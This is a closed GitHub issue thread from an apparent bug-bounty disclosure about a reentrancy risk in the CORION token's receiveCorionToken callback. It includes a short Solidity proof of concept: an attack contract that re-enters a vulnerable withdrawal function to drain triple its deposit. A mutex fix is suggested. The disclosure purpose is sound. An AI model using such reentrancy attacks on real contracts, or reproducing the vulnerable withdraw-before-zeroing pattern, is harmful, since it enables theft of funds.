Closed sgitt-vassky closed 7 years ago
Please, give us an example of the code that will demonstrate a real vulnerability in use.
I've understand what you said but the thing that you are talking about is not related to CORION token. It is a detail of implementation of receiver contract.
This contract will perform 2 recursive calls and withdraw triple the amount of deposited tokens.
contract vulnerableContract {
address public tokenAddress;
mapping (address => uint256) public deposited;
function receiveCotionToken(address _from, uint256 _value, bytes _data) return (bool, uint256) {
deposited[_from] += _value;
return (true, 0);
}
function giveMyTokensBack() {
corionToken(tokenAddress).transfer(msg.sender, deposited[msg.sender]);
deposited[msg.sender] = 0;
}
}
contract attackContract {
bool attackMode = false;
uint8 times = 0;
function receiveCotionToken(address _from, uint256 _value, bytes _data) return (bool, uint256) {
if(attackMode && times < 2) {
times++;
vulnerableContract(_from).giveMyTokensBack();
}
return (true, 0);
}
}
@sgitt-vassky this is not a bug of CORION token anyways. This is an error in third party contract implementation.
Function receiveCorionToken will invoke the caller contract to perform recursive calls.
function()
usually cannot do it assend
gives it only 2k gas. which is not enough for anything but logging. Here if you give only 2k gas, it wouldn't be enough to return the tokens in case of a mistake, so all remaining gas is given toreceiveCorionToken
making re-entry attack possible.Suggested fix: use
mutex
es to solve re-entrance recursive calls issues. https://en.wikipedia.org/wiki/Mutual_exclusion https://en.wikipedia.org/wiki/Lock_(computer_science)My reward address: 0x5Df856EAc1b376d3Bc822C2eD71BA0D8BbB74C04